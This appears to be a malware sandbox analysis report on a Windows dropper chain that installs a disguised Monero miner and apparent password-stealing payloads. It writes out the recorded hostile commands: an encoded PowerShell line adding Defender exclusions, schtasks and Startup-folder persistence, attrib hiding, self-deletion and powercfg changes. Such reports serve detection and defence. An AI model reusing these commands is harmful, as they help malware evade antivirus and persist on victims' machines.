                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 36_2_00D33C0536_2_00D33C05
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 36_2_00D4042236_2_00D40422
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 36_2_00D4566E36_2_00D4566E
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 36_2_00D317D036_2_00D317D0
                            Source: C:\Users\user\AppData\Local\Temp\main\7z.exeProcess token adjusted: Security
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: String function: 00D39DFF appears 36 times
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: String function: 00414A30 appears 76 times
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: String function: 00408000 appears 52 times
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: String function: 00D33BC0 appears 68 times
                            Source: C:\Users\user\Desktop\file.exeCode function: String function: 00ED80C0 appears 130 times
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: String function: 007180C0 appears 130 times
                            Source: IsStopped.exe.6.drStatic PE information: No import functions for PE file found
                            Source: sUSFJjY[1].exe.5.drStatic PE information: No import functions for PE file found
                            Source: sUSFJjY.exe.5.drStatic PE information: No import functions for PE file found
                            Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                            Source: 51.3.Intel_PTT_EK_Recertification.exe.20d0fbb0000.0.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                            Source: 51.3.Intel_PTT_EK_Recertification.exe.20d0fbb0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                            Source: 51.3.Intel_PTT_EK_Recertification.exe.20d0fbb0000.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                            Source: 51.3.Intel_PTT_EK_Recertification.exe.20d0fbb0000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                            Source: 00000033.00000003.2959352962.0000020D0FBB0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                            Source: 00000033.00000003.2959352962.0000020D0FBB0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                            Source: file.exeStatic PE information: Section: ZLIB complexity 0.9962693715940054
                            Source: skotes.exe.0.drStatic PE information: Section: ZLIB complexity 0.9962693715940054
                            Source: cad620f7d1.exe.5.drStatic PE information: Section: .bss ZLIB complexity 1.0003383629931388
                            Source: cad620f7d1.exe.5.drStatic PE information: Section: .bss ZLIB complexity 1.0003383629931388
                            Source: random[1].exe.5.drStatic PE information: Section: tvjsubtq ZLIB complexity 0.9946874345138307
                            Source: e42ef86dbf.exe.5.drStatic PE information: Section: tvjsubtq ZLIB complexity 0.9946874345138307
                            Source: random[1].exe0.5.drStatic PE information: Section: puwxqisl ZLIB complexity 0.9944319811782816
                            Source: 6351911f1d.exe.5.drStatic PE information: Section: puwxqisl ZLIB complexity 0.9944319811782816
                            Source: random[2].exe0.5.drStatic PE information: Section: ZLIB complexity 0.9973177975171232
                            Source: random[2].exe0.5.drStatic PE information: Section: yoxsliso ZLIB complexity 0.9946546365747791
                            Source: 84d98ae8ad.exe.5.drStatic PE information: Section: ZLIB complexity 0.9973177975171232
                            Source: 84d98ae8ad.exe.5.drStatic PE information: Section: yoxsliso ZLIB complexity 0.9946546365747791
                            Source: random[2].exe1.5.drStatic PE information: Section: skauaiwm ZLIB complexity 0.9947207210541901
                            Source: eb571902cc.exe.5.drStatic PE information: Section: skauaiwm ZLIB complexity 0.9947207210541901
                            Source: random[3].exe0.5.drStatic PE information: Section: ZLIB complexity 1.0001672196061644
                            Source: random[3].exe0.5.drStatic PE information: Section: ubvmxkob ZLIB complexity 0.9945724566850659
                            Source: d0e065d272.exe.5.drStatic PE information: Section: ZLIB complexity 1.0001672196061644
                            Source: d0e065d272.exe.5.drStatic PE information: Section: ubvmxkob ZLIB complexity 0.9945724566850659
                            Source: 8fabf18f8e.exe.5.drStatic PE information: Section: .bss ZLIB complexity 1.0003383629931388
                            Source: 8fabf18f8e.exe.5.drStatic PE information: Section: .bss ZLIB complexity 1.0003383629931388
                            Source: random[1].exe2.5.drStatic PE information: Section: .bss ZLIB complexity 1.0003383629931388
                            Source: random[1].exe2.5.drStatic PE information: Section: .bss ZLIB complexity 1.0003383629931388
                            Source: random[2].exe0.5.drStatic PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
                            Source: 84d98ae8ad.exe.5.drStatic PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
                            Source: skotes.exe.0.drStatic PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
                            Source: file.exeStatic PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
                            Source: sUSFJjY[1].exe.5.dr, -.csCryptographic APIs: 'CreateDecryptor'
                            Source: sUSFJjY.exe.5.dr, -.csCryptographic APIs: 'CreateDecryptor'
                            Source: IsStopped.exe.6.dr, -.csCryptographic APIs: 'CreateDecryptor'
                            Source: classification engineClassification label: mal100.troj.spyw.expl.evad.mine.winEXE@102/63@19/10
                            Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 27_2_0094AC74 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,27_2_0094AC74
                            Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 27_2_00951D04 GetCurrentProcess,CloseHandle,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,GetLastError,CloseHandle,27_2_00951D04
                            Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 27_2_0094ABB0 GetModuleHandleW,GetProcAddress,GetDiskFreeSpaceW,27_2_0094ABB0
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 36_2_00436F90 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,36_2_00436F90
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\sUSFJjY[1].exeJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4128:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4460:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5968:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1848:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7480:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7772:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7780:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5916:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2032:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7856:120:WilError_03
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeMutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1312:120:WilError_03
                            Source: C:\Users\user\AppData\Local\Temp\1015823001\e42ef86dbf.exeMutant created: \Sessions\1\BaseNamedObjects\My_mutex
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2044:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2120:120:WilError_03
                            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\abc3bc1985Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1015821001\ae91ff4264.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"
                            Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsStopped.vbs"
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeProcess created: C:\Windows\explorer.exe
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeProcess created: C:\Windows\explorer.exe
                            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
                            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                            Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\desktop.iniJump to behavior
                            Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1015823001\e42ef86dbf.exeFile read: C:\Windows\System32\drivers\etc\hosts
                            Source: C:\Users\user\AppData\Local\Temp\1015823001\e42ef86dbf.exeFile read: C:\Windows\System32\drivers\etc\hosts
                            Source: C:\Users\user\AppData\Local\Temp\1015823001\e42ef86dbf.exeFile read: C:\Windows\System32\drivers\etc\hosts
                            Source: cad620f7d1.exe, 00000024.00000003.2849928748.00000000031F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                            Source: file.exeVirustotal: Detection: 55%
                            Source: file.exeReversingLabs: Detection: 47%
                            Source: RegAsm.exeString found in binary or memory: VTN6Nh5XbzscSXblTyZngwFcev0EQ2FSYT5k/AddbisDSnrOTShvMQJJdg4AWWffUyN6FgZDYQYeQWSoSiJuEQZKetgEV29TVDB20QZZZ0cbXHqZSTxhTh9BZOUCXW5hVTN64gVXb4YGSXYpWyBnnxtcersCQ2GyVz5koAFdbqcESnpWVy5vswVJdikFWWdnUCN6MQNDYdwdQWR8SSJuzQVKeg8IV2+nWzZ2DQpZZ5MWXHqNRTphmhJBZFMOXW5JVTN6
                            Source: RegAsm.exeString found in binary or memory: HAp7ShKLOm3GmM5+zgyhWcs5sL7enZpOudi73Bvejn9MSku740QYz/lLEE6/LoadizmKjORZiH/b6YQkZAy+DUwKeOVBmsk/CxGOfe5Dmg47S5TmGo+5HeYWm9uJ/MwTDjkmR59LOc1Tib0sg18JvklX4BjMvtskVFnbybmO0E89Z4SZTrvLjcm67EGfzLnMTSEezv3c11Xamcn5y4qOfGPFWki+SYkP+uuBXQx8y8oj2Yj+hMuIfeVE2Am5DghPPWhE
                            Source: RegAsm.exeString found in binary or memory: jvE4d4BH846iOq8cTEdG5ujDZBH54Ea+Q2nzL7JLKC7vSRkPMpVDRZA5IGa+cqmib8P7mSGuubkOIrXjrkLk4X5Kkm8SpUOeoVQjvvF0cj5RJKMPGNMTsuNS65uiknOTE4Lzs7JzUnKevGVpSXiJEm8J5pf25wLORunGtsaTpZoyfn6np1dHAp7e8CYGx3K12VPvAeSiAt5LM38hJNEiLsnSrnHlUMPOqfLvoB7DPmC/k6/LoadWt/a5hqMlBX4Dgjbh
                            Source: RegAsm.exeString found in binary or memory: 0RTz/lL2E6/LoadZu/I/iiPuK5IuSrNi4lMCoxPDk0KY0YvJGROfsVXj487QtPO5JTCXBqK+SOJ/+xAX/ZsmFyZCn6KkowmxB4bnAtDCx3M/sGYiMEGGYneZk8+6zv7lb0bHduK0Ky8qyGG1qSlDvz8k3qamdvJuq6fvBXY2ZqOulgWStdsfmvkiJOmZAj+v5SyXJqZyfrr3X1fHJhZud2UilEriYSuvKsJnOph0NNh4kh++5Dx25vejn/uCnjqn3gjX
                            Source: RegAsm.exeString found in binary or memory: CAp7wZWPCT+GkoROvAGSlAp6p0HQj/iXCLsooaBwI6LQ57tmvm76bcQTX5tOXrloyzkppt8y5aNI+y4JuRyma/pZWbvshBCiK1Vrw6YxZGPm5Aj+A5SCfmtL+QSS1o5/xxFPiL5OEgnJu21WjglLy4lMiovuT/ifIL21ZGQQbIKZSjtZPm3hMTSkY46/LoadizkO3uRdSH5vSrqihp++k6b0SPvnxrHNuMzjjvytldqayFxO/EkYT4JpIeBfW1xPBOiJ
                            Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
                            Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
                            Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exe "C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exe"
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1015819001\XpAg0vN.exe "C:\Users\user\AppData\Local\Temp\1015819001\XpAg0vN.exe"
                            Source: C:\Users\user\AppData\Local\Temp\1015819001\XpAg0vN.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAMQAwADEANQA3ADgAMQAwADAAMQBcAHMAVQBTAEYASgBqAFkALgBlAHgAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAMQAwADEANQA3ADgAMQAwADAAMQBcAHMAVQBTAEYASgBqAFkALgBlAHgAZQA7AEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABDADoAXABVAHMAZQByAHMAXABqAG8AbgBlAHMAXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAEkAcwBTAHQAbwBwAHAAZQBkAC4AZQB4AGUAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABDADoAXABVAHMAZQByAHMAXABqAG8AbgBlAHMAXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAEkAcwBTAHQAbwBwAHAAZQBkAC4AZQB4AGUA
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1015821001\ae91ff4264.exe "C:\Users\user\AppData\Local\Temp\1015821001\ae91ff4264.exe"
                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe"
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                            Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                            Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeProcess created: C:\Windows\explorer.exe explorer.exe
                            Source: C:\Users\user\AppData\Local\Temp\1015821001\ae91ff4264.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mode.com mode 65,10
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e file.zip -p24291711423417250691697322505 -oextracted
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_7.zip -oextracted
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_6.zip -oextracted
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_5.zip -oextracted
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exe "C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exe"
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_4.zip -oextracted
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_3.zip -oextracted
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_2.zip -oextracted
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeProcess created: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exe "C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exe"
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_1.zip -oextracted
                            Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsStopped.vbs"
                            Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\IsStopped.exe "C:\Users\user\AppData\Roaming\IsStopped.exe"
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +H "in.exe"
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\in.exe "in.exe"
                            Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: C:\Windows\System32\attrib.exe attrib +H +S C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                            Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: C:\Windows\System32\attrib.exe attrib +H C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                            Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE
                            Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.0.0.1; del in.exe
                            Source: C:\Windows\System32\attrib.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\System32\attrib.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1015823001\e42ef86dbf.exe "C:\Users\user\AppData\Local\Temp\1015823001\e42ef86dbf.exe"
                            Source: unknownProcess created: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.0.0.1
                            Source: C:\Users\user\AppData\Roaming\IsStopped.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe"
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                            Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exe "C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exe" Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1015819001\XpAg0vN.exe "C:\Users\user\AppData\Local\Temp\1015819001\XpAg0vN.exe" Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1015821001\ae91ff4264.exe "C:\Users\user\AppData\Local\Temp\1015821001\ae91ff4264.exe" Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exe "C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exe" Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1015823001\e42ef86dbf.exe "C:\Users\user\AppData\Local\Temp\1015823001\e42ef86dbf.exe" Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
